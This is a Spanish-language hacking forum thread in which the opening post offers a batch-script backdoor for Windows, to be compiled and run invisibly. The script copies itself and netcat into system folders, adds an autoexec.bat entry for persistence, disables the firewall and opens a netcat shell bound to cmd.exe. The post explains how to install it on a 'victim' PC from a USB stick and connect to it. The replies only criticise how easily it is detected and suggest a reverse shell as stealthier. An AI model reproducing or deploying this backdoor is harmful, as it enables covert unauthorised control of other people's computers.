El Backdoor más simple y eficiente

Iniciado por _TTFH_3500, 6 Junio 2014, 16:41 PM

0 Miembros y 1 Visitante están viendo este tema.

_TTFH_3500

Compilamos el siguiente codigo con Bat2Exe PRO y elegimos la opción "Start Invisible (NO CONSOLE window)" En el codigo cambiamos "Backdoor.exe" por cualquier nombre porque sino sería muy obio y en "3500" escribimos el puerto que quieramos.

Código (dos) [Seleccionar]
@echo off
IF exist %windir%\[i]Backdoor.exe[/i] goto :on
copy /y [i]Backdoor.exe[/i] %windir%
copy /y nc.exe %windir%\System32
echo start %windir%\[i]Backdoor.exe[/i]>>autoexec.bat
:on
netsh firewall set opmode mode=disable
nc -L -d -e cmd.exe -p [b]3500[/b]
pause>nul



Para acceder a la PC que tiene instalado en Backdoor escribimos en CMD:

nc -vv IPvictima PUERTO


Para instalar el Backdoor en la PC de la victima copiamos nuetro backdoor compilado y el archivo nc.exe (que una version reducida del NetCat que se puede descargar de este foro) a un Pendrive y iniciamos el Backdoor.exe, este se copiara a C:\Windows\ porque es una ubicación facíl de localizar y donde ninguna persona normal miraría y el NetCat debe estar en System32 para que se abra desde CMD al escribir nc.

IMPORTANTE: en nuestra pc en System32 tambien tenemos que tener el archivo nc.exe


Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Gh057

Cita de: _TTFH_3500 en  6 Junio 2014, 16:41 PM
... este se copiara a C:\Windows\ porque es una ubicación facíl de localizar y donde ninguna persona normal miraría y el NetCat debe estar en System32 para que se abra desde CMD al escribir nc...
:rolleyes:
4 d0nd3 1r4 3l gh057? l4 r3d 3s 74n v4s74 3 1nf1n1t4...

Vaagish

No hay manera que no lo detecte un AV.. inclusive sin tener uno instalado  :xD

daryo

si casi todas las versiones de netcat son detectadas . hacer una shell inversa con cualquier lenguaje de programacion es sencillo y es mucho mas indetectable xD.

ademas eso de desactivar  por consola a el firewall no funciona amenos que se tengan permisos de admin :)
buenas